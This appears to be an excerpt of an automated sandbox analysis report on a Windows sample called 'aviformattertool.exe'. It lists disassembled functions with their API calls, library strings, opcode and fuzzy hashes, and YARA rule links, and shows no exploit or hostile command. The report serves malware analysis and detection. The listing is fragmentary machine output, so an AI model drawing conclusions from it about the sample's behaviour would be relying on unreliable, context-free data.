                                                                                                                                                          • Instruction Fuzzy Hash: 53215376A002499FDB10DFA8D945ADEF7F5FF48324F10856AE918EB240DB30E9458B50
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A1CC2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A1CC34
                                                                                                                                                            • Part of subcall function 02A1D210: std::exception::exception.LIBCMT ref: 02A1D23F
                                                                                                                                                            • Part of subcall function 02A1D9C6: __EH_prolog.LIBCMT ref: 02A1D9CB
                                                                                                                                                            • Part of subcall function 02A23ACC: _malloc.LIBCMT ref: 02A23AE4
                                                                                                                                                            • Part of subcall function 02A1D26F: __EH_prolog.LIBCMT ref: 02A1D274
                                                                                                                                                          Strings
                                                                                                                                                          • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02A1CC71
                                                                                                                                                          • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02A1CC6A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: H_prolog$_mallocstd::exception::exception
                                                                                                                                                          • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                                                                                                          • API String ID: 1953324306-1943798000
                                                                                                                                                          • Opcode ID: 1f91197e05e3128c80076693be70e121805d317eaa44ec28d33bc4a82febb3c2
                                                                                                                                                          • Instruction ID: 887b0f46a30f06f18a06035d56be0f6f6e19a8833472a8330e26023e40ad5e08
                                                                                                                                                          • Opcode Fuzzy Hash: 1f91197e05e3128c80076693be70e121805d317eaa44ec28d33bc4a82febb3c2
                                                                                                                                                          • Instruction Fuzzy Hash: 6E21AD71E802589ADB14EFE8DA54AAEFBB5EF54724F00449DE805A7290DF709A08CF51
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A153DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _malloc.LIBCMT ref: 02A153EF
                                                                                                                                                            • Part of subcall function 02A22F2C: __FF_MSGBANNER.LIBCMT ref: 02A22F43
                                                                                                                                                            • Part of subcall function 02A22F2C: __NMSG_WRITE.LIBCMT ref: 02A22F4A
                                                                                                                                                            • Part of subcall function 02A22F2C: RtlAllocateHeap.NTDLL(007D0000,00000000,00000001), ref: 02A22F6F
                                                                                                                                                          • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 02A15401
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                                                                                                          • String ID: \save.dat
                                                                                                                                                          • API String ID: 4128168839-3580179773
                                                                                                                                                          • Opcode ID: 98d4a5f7c09bed2525c505ca96957ac57cceaa76607c65911600d109a48d0a69
                                                                                                                                                          • Instruction ID: 928080a1d64be53b072893c84cf00fa4cad35255238107196600b29f13d8f812
                                                                                                                                                          • Opcode Fuzzy Hash: 98d4a5f7c09bed2525c505ca96957ac57cceaa76607c65911600d109a48d0a69
                                                                                                                                                          • Instruction Fuzzy Hash: 9A113D329042547BDB268F698C81A6FFF6BDF83664B5442A9F88567201DE721D06C6A0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004044C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe,00000104,?,00000000,?,?,?,?,00402FB0), ref: 004044E6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileModuleName
                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe$x5}
                                                                                                                                                          • API String ID: 514040917-3315635817
                                                                                                                                                          • Opcode ID: 1553a01dc9c6c76eabdb62950bf01ffd347b73ed72aca6370f9915d979b7da58
                                                                                                                                                          • Instruction ID: c15c0e16bc2d24b1357846006cb84aefa573bef56eb07058d9188c40f932783b
                                                                                                                                                          • Opcode Fuzzy Hash: 1553a01dc9c6c76eabdb62950bf01ffd347b73ed72aca6370f9915d979b7da58
                                                                                                                                                          • Instruction Fuzzy Hash: E6115EF2900218BFD711EF98DD81CAB77BCEB45358B1000BBF605B7241EA759E149BA9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A13965 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A1396A
                                                                                                                                                          • std::runtime_error::runtime_error.LIBCPMT ref: 02A139C1
                                                                                                                                                            • Part of subcall function 02A11410: std::exception::exception.LIBCMT ref: 02A11428
                                                                                                                                                            • Part of subcall function 02A1A59E: __EH_prolog.LIBCMT ref: 02A1A5A3
                                                                                                                                                            • Part of subcall function 02A1A59E: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02A1A5B2
                                                                                                                                                            • Part of subcall function 02A1A59E: __CxxThrowException@8.LIBCMT ref: 02A1A5D1
                                                                                                                                                          Strings
                                                                                                                                                          • Day of month is not valid for year, xrefs: 02A139AC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                                                                          • String ID: Day of month is not valid for year
                                                                                                                                                          • API String ID: 1404951899-1521898139
                                                                                                                                                          • Opcode ID: 801016337ee546daef802a463ca8c45341657abed9361edc4fe7b5e9a5b40efe
                                                                                                                                                          • Instruction ID: b1725b32e4a8fb693ac1d8e1a21905320eec4b4ceed10509e620db58ad2f73f5
                                                                                                                                                          • Opcode Fuzzy Hash: 801016337ee546daef802a463ca8c45341657abed9361edc4fe7b5e9a5b40efe
                                                                                                                                                          • Instruction Fuzzy Hash: A001D47A954209EADF01EFA8C901AEEB779FF18720F40405AFD0497200EF748B45CB95
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A1B080 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • std::exception::exception.LIBCMT ref: 02A1FA97
                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 02A1FAAC
                                                                                                                                                            • Part of subcall function 02A23ACC: _malloc.LIBCMT ref: 02A23AE4
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                                          • String ID: bad allocation
                                                                                                                                                          • API String ID: 4063778783-2104205924
                                                                                                                                                          • Opcode ID: 2c2dbfd263486a4e86dd590f34ba45aa134663a28bc21ca7d2a6b3abc2b1772e
                                                                                                                                                          • Instruction ID: 8ecb64b1a6395d74d824c1c30aff53844fc7c202eae13393592c7b7a594b4476
                                                                                                                                                          • Opcode Fuzzy Hash: 2c2dbfd263486a4e86dd590f34ba45aa134663a28bc21ca7d2a6b3abc2b1772e
                                                                                                                                                          • Instruction Fuzzy Hash: 63F0AE70640319669F04E7788955AAF73EDAF04324F540E65B525E2180EF74E6088594
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A13C16 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A13C1B
                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 02A13C30
                                                                                                                                                            • Part of subcall function 02A22437: std::exception::exception.LIBCMT ref: 02A22441
                                                                                                                                                            • Part of subcall function 02A1A5D7: __EH_prolog.LIBCMT ref: 02A1A5DC
                                                                                                                                                            • Part of subcall function 02A1A5D7: __CxxThrowException@8.LIBCMT ref: 02A1A605
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                          • String ID: bad cast
                                                                                                                                                          • API String ID: 1300498068-3145022300
                                                                                                                                                          • Opcode ID: e6b15290b004222857f9921b1ae60a1717504f090a5074aa383fc22e4540d3ec
                                                                                                                                                          • Instruction ID: af7339a1b79781acc89d8032b8f1623ed0c271c4379c591ca4ca7e7fa39d2416
                                                                                                                                                          • Opcode Fuzzy Hash: e6b15290b004222857f9921b1ae60a1717504f090a5074aa383fc22e4540d3ec
                                                                                                                                                          • Instruction Fuzzy Hash: 65F0A072D405089BCB0ADF58D540AEAB775EF56321F1040AEFD065B240CF72DA4ACA90
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A13881 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A13886
                                                                                                                                                          • std::runtime_error::runtime_error.LIBCPMT ref: 02A138A5
                                                                                                                                                            • Part of subcall function 02A11410: std::exception::exception.LIBCMT ref: 02A11428
                                                                                                                                                            • Part of subcall function 02A1890C: _memmove.LIBCMT ref: 02A1892C
                                                                                                                                                          Strings
                                                                                                                                                          • Day of month value is out of range 1..31, xrefs: 02A13894
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                                                                          • String ID: Day of month value is out of range 1..31
                                                                                                                                                          • API String ID: 3258419250-1361117730
                                                                                                                                                          • Opcode ID: b39bda4b046687de2ea6ff4f452bb69fa46ed443654efe98909e6c8b2bdf7481
                                                                                                                                                          • Instruction ID: d924e8c95edaa44e092bda4b8a3c21142e45249dc5a400cddb2f7f1a38a8ba0d
                                                                                                                                                          • Opcode Fuzzy Hash: b39bda4b046687de2ea6ff4f452bb69fa46ed443654efe98909e6c8b2bdf7481
                                                                                                                                                          • Instruction Fuzzy Hash: 14E0D872F802049BE715AB988D12BEDB779DF08B20F40008AF50563280DFB519048F95
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A138CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A138D2
                                                                                                                                                          • std::runtime_error::runtime_error.LIBCPMT ref: 02A138F1
                                                                                                                                                            • Part of subcall function 02A11410: std::exception::exception.LIBCMT ref: 02A11428
                                                                                                                                                            • Part of subcall function 02A1890C: _memmove.LIBCMT ref: 02A1892C
                                                                                                                                                          Strings
                                                                                                                                                          • Year is out of valid range: 1400..10000, xrefs: 02A138E0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                                                                          • String ID: Year is out of valid range: 1400..10000
                                                                                                                                                          • API String ID: 3258419250-2344417016
                                                                                                                                                          • Opcode ID: 0aadb3d2033c4bae4361086f4117c1d641948848ca2e87c061421edb2ab86492
                                                                                                                                                          • Instruction ID: 55cd7e1246e99b7cea307c10cdd97d8748f1e3afb4d438313f181f47c3611f04
                                                                                                                                                          • Opcode Fuzzy Hash: 0aadb3d2033c4bae4361086f4117c1d641948848ca2e87c061421edb2ab86492
                                                                                                                                                          • Instruction Fuzzy Hash: E0E0D872FC02049BE715EB988D11BEDB779DF08B20F00048AF50267280DEB51944CB95
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A13919 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A1391E
                                                                                                                                                          • std::runtime_error::runtime_error.LIBCPMT ref: 02A1393D
                                                                                                                                                            • Part of subcall function 02A11410: std::exception::exception.LIBCMT ref: 02A11428
                                                                                                                                                            • Part of subcall function 02A1890C: _memmove.LIBCMT ref: 02A1892C
                                                                                                                                                          Strings
                                                                                                                                                          • Month number is out of range 1..12, xrefs: 02A1392C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                                                                          • String ID: Month number is out of range 1..12
                                                                                                                                                          • API String ID: 3258419250-4198407886
                                                                                                                                                          • Opcode ID: 45c7a79bdaca0023802e69e17c44ec4435e6e35f7114ced78373b7ce193102d0
                                                                                                                                                          • Instruction ID: 3f5ab4789514d8913dc48c9b756223b57d14d211554e07d31c80382a16004cca
                                                                                                                                                          • Opcode Fuzzy Hash: 45c7a79bdaca0023802e69e17c44ec4435e6e35f7114ced78373b7ce193102d0
                                                                                                                                                          • Instruction Fuzzy Hash: D7E0D872F802089BE715BB988E11BEDB779DF08B20F00008AF90167280DEB529048B95
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A119C2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • TlsAlloc.KERNEL32 ref: 02A119CC
                                                                                                                                                          • GetLastError.KERNEL32 ref: 02A119D9
                                                                                                                                                            • Part of subcall function 02A11712: __EH_prolog.LIBCMT ref: 02A11717
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocErrorH_prologLast
                                                                                                                                                          • String ID: tss
                                                                                                                                                          • API String ID: 249634027-1638339373
                                                                                                                                                          • Opcode ID: 1e632ecab3baed7d12035959ae142ccf771b783e553ca2993effef10c411891f
                                                                                                                                                          • Instruction ID: 79fe04e74b909b279333232c59fdb4c01bce78762cb8990c6dfbc15274bc7d2e
                                                                                                                                                          • Opcode Fuzzy Hash: 1e632ecab3baed7d12035959ae142ccf771b783e553ca2993effef10c411891f
                                                                                                                                                          • Instruction Fuzzy Hash: 3DE08671D442155BC3007B78DD0908BBBE49A42370F108B66FDBA872D0EF3489118BC6
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A13BD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A13BD8
                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 02A13BED
                                                                                                                                                            • Part of subcall function 02A22437: std::exception::exception.LIBCMT ref: 02A22441
                                                                                                                                                            • Part of subcall function 02A1A5D7: __EH_prolog.LIBCMT ref: 02A1A5DC
                                                                                                                                                            • Part of subcall function 02A1A5D7: __CxxThrowException@8.LIBCMT ref: 02A1A605
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                          • String ID: bad cast
                                                                                                                                                          • API String ID: 1300498068-3145022300
                                                                                                                                                          • Opcode ID: 1c6eb0f103dab558218a71a752e5fee25288dd6ee917b2838c77f1710e0f7a7c
                                                                                                                                                          • Instruction ID: 841b8330eff09db385657c53e8761b69668f6da32f90a181fd7bbcc231ca116d
                                                                                                                                                          • Opcode Fuzzy Hash: 1c6eb0f103dab558218a71a752e5fee25288dd6ee917b2838c77f1710e0f7a7c
                                                                                                                                                          • Instruction Fuzzy Hash: 89E09A70940108DBCB05EF58D241BACB771EB04310F4080A8A9065B280DF308A09CE81
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040261B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseQueryValue
                                                                                                                                                          • String ID: JSON Nested Objects 66
                                                                                                                                                          • API String ID: 3356406503-4184186574
                                                                                                                                                          • Opcode ID: 1824a804e9f496e40159f017b9fd672c87ce2b4c5c441e96737de9040545891f
                                                                                                                                                          • Instruction ID: aa3bd1ae59daaa3fa17d745cbcdd45fda04deab230bb4da5387f22543defac0c
                                                                                                                                                          • Opcode Fuzzy Hash: 1824a804e9f496e40159f017b9fd672c87ce2b4c5c441e96737de9040545891f
                                                                                                                                                          • Instruction Fuzzy Hash: 67D05E30D48106FAC7005F648F0D22E3AE4AE043447224837A513B40D0C77C8A026A5F
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040395C Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 00403984
                                                                                                                                                          • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039B8
                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039D2
                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039E9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocHeap$FreeVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3499195154-0
                                                                                                                                                          • Opcode ID: 5445ee1769e2b4dfc8a7df9410455d6395cf6e66bb57eb1db49a90ecc10dc223
                                                                                                                                                          • Instruction ID: a42712acd455d35c8afd215c706735e8fa7757c2ad65ecbc9136afbab992c5c7
                                                                                                                                                          • Opcode Fuzzy Hash: 5445ee1769e2b4dfc8a7df9410455d6395cf6e66bb57eb1db49a90ecc10dc223
                                                                                                                                                          • Instruction Fuzzy Hash: 59114C702003019FD7308F19EE4A9227BB9FB847617154A3AF192E71F0D7729961DF19
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%